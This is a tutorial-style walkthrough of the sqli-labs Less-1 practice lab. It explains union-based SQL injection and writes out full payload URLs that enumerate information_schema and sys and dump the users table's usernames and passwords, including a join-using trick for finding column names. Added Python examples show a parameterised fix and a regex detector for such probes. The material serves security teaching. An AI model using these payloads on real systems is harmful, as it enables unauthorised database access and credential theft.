This post walks through the bypass techniques in sqli-labs; I set the environment up with phpStudy (小皮).
Notes on the phpStudy setup:
1. Use Apache, not nginx, and remember to edit db-creds.inc under sql-connections, which holds the database connection settings.
2. Don't use a PHP version that is too new (the lab code shown below calls the legacy mysql_* functions, which PHP 7 removed).
SQL comments: -- and #
1. When doing SQL injection we need to comment out the rest of the query. Many people write --+, but the comment is really "-- " (two dashes and a space); the + is the URL-encoded space. Because the application's own single quote follows your injected statement, you have to either close it or comment it out, so both --' and --+ work; if you use the comment form, the space is mandatory.
2. When we use #, the # in a URL is a fragment that only directs the browser (anchors, for example) and is never sent to the server. Since the HTTP request does not include the #, it has to be encoded as %23.
First, download the sqli-labs source from GitHub:
GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based.
A quick look at Level 1
It asks us to enter an id.
It's the first level, so let's look at the source code.
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
// $id is interpolated straight into the query text: this is the injection point
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
Look at $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1": id is enclosed in single quotes, so first pass it a single quote and see whether it throws an error.
An error means there is an injection point. Nice.
Some background first
To pull data out you can use and, or, and union.
When querying we need to find the database name, table names, column names, and then the data.
For a union query we need to know how many columns the original query has.
Let's run an experiment.
mysql> select * from users union select 1,2;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from users union select 1,2,3;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 1 | 2 | 3 |
+----+----------+------------+
9 rows in set (0.00 sec)
mysql>
It's easy to see that a union query fails when the column counts don't match.
Now look at this:
mysql> select * from users order by 1 asc;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
+----+----------+------------+
8 rows in set (0.00 sec)
mysql> select * from users order by username asc;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 8 | admin | admin |
| 2 | Angelina | I-kill-you |
| 7 | batman | mob!le |
| 1 | Dumb | Dumb |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
+----+----------+------------+
8 rows in set (0.00 sec)
mysql> select * from users order by 2 asc;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 8 | admin | admin |
| 2 | Angelina | I-kill-you |
| 7 | batman | mob!le |
| 1 | Dumb | Dumb |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
+----+----------+------------+
8 rows in set (0.00 sec)
mysql>
Having seen that, you'll understand that order by can be used to probe the number of columns.
Hands-on (the original's screenshots are not reproduced here)
Probing 3 columns
What happens when probing 4 columns
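As an added example (not from the original post or from sqli-labs), here is the Less-1 query rebuilt on SQLite so that the quote error, the order by probe, the column-count mismatch and the working union can be run offline, next to the parameterised form that neutralises all of them. The rows and payloads are constructed; sqlite_version() stands in for MySQL's version().

```python
import sqlite3

# Constructed subset of the lab's users table.
USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (8, "admin", "admin")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return con


def lookup_vulnerable(con, user_id):
    # Same construction as Less-1: $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1"
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    try:
        return con.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return f"ERROR: {exc}"  # error text leaks straight back, as in the lab


def lookup_safe(con, user_id):
    # Parameterised query: the value is bound by the driver and never parsed as SQL.
    return con.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)).fetchall()


def demo():
    """Run the post's probes through both forms; returns (vulnerable, safe) results."""
    con = make_db()
    payloads = {
        "quote": "1'",                                           # unbalanced quote -> syntax error
        "order_by_4": "1' order by 4 -- ",                       # one past the real column count
        "union_2": "-1' union select 1,2 -- ",                   # column count mismatch
        "union_3": "-1' union select 1,sqlite_version(),3 -- ",  # matching count: injected row comes back
    }
    vulnerable = {k: lookup_vulnerable(con, p) for k, p in payloads.items()}
    safe = {k: lookup_safe(con, p) for k, p in payloads.items()}
    return vulnerable, safe
```

With the bound parameter every payload is compared as a literal id value, so the safe form returns no rows for all four while the vulnerable form errors on three and returns the injected row on the fourth.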
Finding the database and tables
mysql> select * from users union select 1,user(),3;
+----+----------------+------------+
| id | username | password |
+----+----------------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 1 | root@localhost | 3 |
+----+----------------+------------+
9 rows in set (0.00 sec)
mysql> select * from users union select 1,database(),3;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 1 | security | 3 |
+----+----------+------------+
9 rows in set (0.00 sec)
mysql> select * from users union select 1,version(),3;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 1 | 5.7.26 | 3 |
+----+----------+------------+
9 rows in set (0.16 sec)
mysql>
After the above you also know the three system functions user(), database() and version(); in short, query, query, query.
Hands-on (screenshots not reproduced here)
user()
database()
version()
Where do we look up column names???
sys
information_schema
These two system databases are the ones to focus on; look at the second one first.
mysql> use information_schema
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS | <- column names
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| OPTIMIZER_TRACE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA | <- database names
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
| INNODB_LOCKS |
| INNODB_TRX |
| INNODB_SYS_DATAFILES |
| INNODB_FT_CONFIG |
| INNODB_SYS_VIRTUAL |
| INNODB_CMP |
| INNODB_FT_BEING_DELETED |
| INNODB_CMP_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMPMEM_RESET |
| INNODB_FT_DELETED |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_LOCK_WAITS |
| INNODB_TEMP_TABLE_INFO |
| INNODB_SYS_INDEXES |
| INNODB_SYS_TABLES |
| INNODB_SYS_FIELDS |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_BUFFER_PAGE |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_INDEX_TABLE |
| INNODB_FT_INDEX_CACHE |
| INNODB_SYS_TABLESPACES |
| INNODB_METRICS |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_CMPMEM |
| INNODB_BUFFER_POOL_STATS |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_TABLESTATS |
+---------------------------------------+
61 rows in set (0.00 sec)
mysql>
Next, look at SCHEMATA
mysql> desc SCHEMATA;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id: 39
Current database: information_schema
+----------------------------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+----------------------------+--------------+------+-----+---------+-------+
| CATALOG_NAME | varchar(512) | NO | | | |
| SCHEMA_NAME | varchar(64) | NO | | | |
| DEFAULT_CHARACTER_SET_NAME | varchar(32) | NO | | | |
| DEFAULT_COLLATION_NAME | varchar(32) | NO | | | |
| SQL_PATH | varchar(512) | YES | | NULL | |
+----------------------------+--------------+------+-----+---------+-------+
5 rows in set (0.00 sec)
mysql> select SCHEMA_NAME from SCHEMATA;
+--------------------+
| SCHEMA_NAME |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| security |
| sys |
+--------------------+
5 rows in set (0.00 sec)
mysql>
Note: once information_schema is filtered you can fall back to sys, but it only yields schema and table-level names; join + using is needed to recover the column names.
Let's query it
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20table_name%20from%20information_schema.tables),3%20--+
It says the subquery returns more than 1 row
Let me try without the subquery
Code
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,table_name,3%20from%20information_schema.tables--+
This obviously returns the first table of the first database
Add a condition on the schema name after it and it will query the security database
Code
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=%27security%27--+
Check the database
You can add a limit to walk through the tables one by one
Code
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%201,1--+
That's too tedious
Let's use a subquery again
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),3%20--+
Once you have all the tables, start on the column names: change tables to columns and add an and condition restricting table_name to users
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27and%20table_name=%27users%27),3%20--+
Now you know the database (security), the table (users) and the columns (username, password)
Then just query normally
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20username,password%20from%20users),3--+
But it complains that the operand returns more than one row
So what now? group_concat, of course
Code
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(username,password)%20from%20users),3--+
Looks a bit odd; add a separator
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(username,0x3a,password)%20from%20users),3--+
And that's done.
But what if information_schema is filtered? Then it's time to bring in our sys database.
mysql> use sys;
Database changed
mysql> show tables;
+-----------------------------------------------+
| Tables_in_sys |
+-----------------------------------------------+
| host_summary |
| host_summary_by_file_io |
| host_summary_by_file_io_type |
| host_summary_by_stages |
| host_summary_by_statement_latency |
| host_summary_by_statement_type |
| innodb_buffer_stats_by_schema |
| innodb_buffer_stats_by_table |
| innodb_lock_waits |
| io_by_thread_by_latency |
| io_global_by_file_by_bytes |
| io_global_by_file_by_latency |
| io_global_by_wait_by_bytes |
| io_global_by_wait_by_latency |
| latest_file_io |
| memory_by_host_by_current_bytes |
| memory_by_thread_by_current_bytes |
| memory_by_user_by_current_bytes |
| memory_global_by_current_bytes |
| memory_global_total |
| metrics |
| processlist |
| ps_check_lost_instrumentation |
| schema_auto_increment_columns |
| schema_index_statistics |
| schema_object_overview |
| schema_redundant_indexes |
| schema_table_lock_waits |
| schema_table_statistics |
| schema_table_statistics_with_buffer |
| schema_tables_with_full_table_scans |
| schema_unused_indexes |
| session |
| session_ssl_status |
| statement_analysis |
| statements_with_errors_or_warnings |
| statements_with_full_table_scans |
| statements_with_runtimes_in_95th_percentile |
| statements_with_sorting |
| statements_with_temp_tables |
| sys_config |
| user_summary |
| user_summary_by_file_io |
| user_summary_by_file_io_type |
| user_summary_by_stages |
| user_summary_by_statement_latency |
| user_summary_by_statement_type |
| version |
| wait_classes_global_by_avg_latency |
| wait_classes_global_by_latency |
| waits_by_host_by_latency |
| waits_by_user_by_latency |
| waits_global_by_latency |
| x$host_summary |
| x$host_summary_by_file_io |
| x$host_summary_by_file_io_type |
| x$host_summary_by_stages |
| x$host_summary_by_statement_latency |
| x$host_summary_by_statement_type |
| x$innodb_buffer_stats_by_schema |
| x$innodb_buffer_stats_by_table |
| x$innodb_lock_waits |
| x$io_by_thread_by_latency |
| x$io_global_by_file_by_bytes |
| x$io_global_by_file_by_latency |
| x$io_global_by_wait_by_bytes |
| x$io_global_by_wait_by_latency |
| x$latest_file_io |
| x$memory_by_host_by_current_bytes |
| x$memory_by_thread_by_current_bytes |
| x$memory_by_user_by_current_bytes |
| x$memory_global_by_current_bytes |
| x$memory_global_total |
| x$processlist |
| x$ps_digest_95th_percentile_by_avg_us |
| x$ps_digest_avg_latency_distribution |
| x$ps_schema_table_statistics_io |
| x$schema_flattened_keys |
| x$schema_index_statistics |
| x$schema_table_lock_waits |
| x$schema_table_statistics |
| x$schema_table_statistics_with_buffer |
| x$schema_tables_with_full_table_scans |
| x$session |
| x$statement_analysis |
| x$statements_with_errors_or_warnings |
| x$statements_with_full_table_scans |
| x$statements_with_runtimes_in_95th_percentile |
| x$statements_with_sorting |
| x$statements_with_temp_tables |
| x$user_summary |
| x$user_summary_by_file_io |
| x$user_summary_by_file_io_type |
| x$user_summary_by_stages |
| x$user_summary_by_statement_latency |
| x$user_summary_by_statement_type |
| x$wait_classes_global_by_avg_latency |
| x$wait_classes_global_by_latency |
| x$waits_by_host_by_latency |
| x$waits_by_user_by_latency |
| x$waits_global_by_latency |
+-----------------------------------------------+
101 rows in set (0.00 sec)
mysql>
Let's look at the auto-increment table, schema_auto_increment_columns
mysql> desc schema_auto_increment_columns ;
+----------------------+------------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+----------------------+------------------------+------+-----+---------+-------+
| table_schema | varchar(64) | NO | | | |
| table_name | varchar(64) | NO | | | |
| column_name | varchar(64) | NO | | | |
| data_type | varchar(64) | NO | | | |
| column_type | longtext | NO | | NULL | |
| is_signed | int(1) | NO | | 0 | |
| is_unsigned | int(1) | NO | | 0 | |
| max_value | bigint(21) unsigned | YES | | NULL | |
| auto_increment | bigint(21) unsigned | YES | | NULL | |
| auto_increment_ratio | decimal(25,4) unsigned | YES | | NULL | |
+----------------------+------------------------+------+-----+---------+-------+
10 rows in set (0.00 sec)
Try to query the column names
mysql> select column_name from schema_auto_increment_columns where table_schema='security' and table_name = 'users';
+-------------+
| column_name |
+-------------+
| id |
+-------------+
1 row in set (0.01 sec)
mysql>
It seems only one column comes back;
adding group_concat doesn't help either
mysql> select group_concat(column_name) from schema_auto_increment_columns where table_schema='security' and table_name = 'users';
+---------------------------+
| group_concat(column_name) |
+---------------------------+
| id |
+---------------------------+
1 row in set (0.01 sec)
mysql>
So sys can't give us the column names. There is always a way, just a harder one: column-name-less injection.
Using join-using to extract column names
Code
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%20*%20from%20(select%20*%20from%20users%20as%20a%20join%20users%20as%20b)%20as%20c%20--+
What this does is alias users as a, join users again as b, and query the combination as c; because both sides carry the same column names, the duplicate column name is reported in the error.
Then add that column name inside using, breaking through one column at a time
20select%20*%20from%20(select%20*%20from%20users%20as%20a%20join%20users%20as%20b%20using(id))%20as%20c%20--+
Until finally all of them are obtained:
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%20*%20from%20(select%20*%20from%20users%20as%20a%20join%20users%20as%20b%20using(id,username,password))%20as%20c%20--+
The number inside the backticks refers to the column at that position (the union with select 1,2,3 names the columns 1, 2 and 3)
mysql> use security ;
Database changed
mysql> select `3` from (select 1,2,3 union select*from users) as a;
+------------+
| 3 |
+------------+
| 3 |
| Dumb |
| I-kill-you |
| p@ssword |
| crappy |
| stupidity |
| genious |
| mob!le |
| admin |
+------------+
9 rows in set (0.00 sec)
mysql>
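Since the Less-1 source writes every id to result.txt ('ID:'.$id."\n"), that file doubles as a detection source. The following is an added example, not part of the original post or of sqli-labs, that scans constructed result.txt-style lines for the probes used throughout this post (stray quote, order by N, union select, information_schema/sys reads, group_concat, join ... using) and flags anything that is not the plain integer the lab expects.

```python
import re

# Constructed result.txt-style lines ('ID:'.$id."\n"). PHP has already URL-decoded
# $_GET, so a '--+' in the URL arrives as '-- ' and '%23' arrives as '#'.
SAMPLE_LOG = """\
ID:1
ID:1'
ID:1' order by 3 -- 
ID:1' order by 4 -- 
ID:-1' union select 1,database(),3 -- 
ID:-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 -- 
ID:-1' union select * from (select * from users as a join users as b using(id)) as c -- 
ID:1' #
ID:42
"""

# (tag, regex) pairs, matched against the lower-cased, whitespace-collapsed id value.
SIGNATURES = [
    ("quote", r"'"),
    ("comment", r"(--(\s|$)|#|/\*)"),
    ("order_by_probe", r"\border by \d+"),
    ("union", r"\bunion (all )?select\b"),
    ("schema_read", r"\b(information_schema|sys)\.\w+"),
    ("group_concat", r"\bgroup_concat\("),
    ("join_using", r"\bjoin\b.*\busing\s*\("),
]


def classify(raw_id):
    """Return the signature tags that fire for one logged id value ([] if benign)."""
    norm = re.sub(r"\s+", " ", raw_id.strip().lower())
    if re.fullmatch(r"\d+", norm):
        return []  # the lab's id is a plain integer; that is the only benign shape
    tags = [name for name, pat in SIGNATURES if re.search(pat, norm)]
    return tags or ["non_numeric"]  # not an integer, but no known probe pattern


def scan_log(text):
    """Parse result.txt content; return (line_no, id, tags) for every suspicious line."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line.startswith("ID:"):
            continue  # not a Less-1 log entry
        raw_id = line[3:]
        tags = classify(raw_id)
        if tags:
            findings.append((line_no, raw_id, tags))
    return findings
```

The integer allow-list does the real work; the signature tags only exist to tell a quote test apart from a full union read of information_schema when triaging.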